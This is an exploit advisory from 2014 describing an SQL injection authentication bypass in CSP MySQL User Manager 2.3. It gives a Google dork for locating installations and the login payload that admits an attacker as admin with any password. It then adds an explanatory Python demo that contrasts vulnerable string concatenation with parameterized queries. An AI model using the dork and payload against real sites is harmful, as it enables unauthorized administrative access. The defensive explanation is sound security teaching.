
CSP MySQL User Manager 2.3 SQL Injection

Posted on 09 January 2014

# Exploit Title: CSP MySQL User Manager v2.3 SQL Injection Authentication Bypass
# Google Dork: intitle:"CSP MySQL User Manager"
# Date: 8/1/2013
# Exploit Author: Youssef mami
# Vendor Homepage: https://code.google.com/p/cspmum/
# Software Link: https://code.google.com/p/cspmum/downloads/detail?name=cmum-23.zip&can=2&q=
# Version: 2.3
# Tested on: Linux 2.6.38-11
# CVE : nothing
##################################################################################
SQL Injection Authentication Bypass
Product Page: https://code.google.com/p/cspmum/downloads/detail?name=cmum-23.zip&can=2&q=
Author(Pentester): Youssef mami (contact@hammamet-services.com)
On Web: www.hammamet-services.com and http://hiservices.blogspot.com (our blog)
On Social: www.facebook.com/hammamet.informatique and https://twitter.com/hammamet_info
##################################################################################
We just need to input the admin login like this: admin' or ' 1=1-- and any password :-)

login : admin' or ' 1=1--
password: hammamet informatique services
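
Why the login value above is accepted with any password, and the fix, shown as an added example that is not code from CSP MySQL User Manager or from the advisory author. It assumes the login check pastes both fields into one SQL string; the table, column and function names are hypothetical, and in-memory SQLite stands in for MySQL so the block runs offline.

```python
import sqlite3

# Constructed sample data. Table and column names are hypothetical, and the
# password is stored in clear only to keep the focus on query construction.
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    return db

def build_concatenated(login: str, password: str) -> str:
    # Assumed vulnerable pattern: user input pasted into the SQL text.
    return ("SELECT login FROM users WHERE login = '" + login +
            "' AND password = '" + password + "'")

def login_concatenated(db: sqlite3.Connection, login: str, password: str) -> bool:
    # With the advisory's login value the WHERE clause becomes
    #   login = 'admin' or ' 1=1--' AND password = '...'
    # AND binds tighter than OR, so the password test attaches to the
    # injected string and login = 'admin' alone selects the row.
    return db.execute(build_concatenated(login, password)).fetchone() is not None

def login_parameterized(db: sqlite3.Connection, login: str, password: str) -> bool:
    # Placeholders send the input as data: the quote cannot close the
    # literal, so the whole value is compared against the login column.
    row = db.execute(
        "SELECT login FROM users WHERE login = ? AND password = ?",
        (login, password),
    ).fetchone()
    return row is not None

PAYLOAD = "admin' or ' 1=1--"  # login value quoted in the advisory

if __name__ == "__main__":
    db = make_db()
    print(build_concatenated(PAYLOAD, "anything"))
    print("concatenated :", login_concatenated(db, PAYLOAD, "anything"))
    print("parameterized:", login_parameterized(db, PAYLOAD, "anything"))
```

In PHP the same fix is a prepared statement through mysqli or PDO with bound parameters in place of string concatenation.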

 
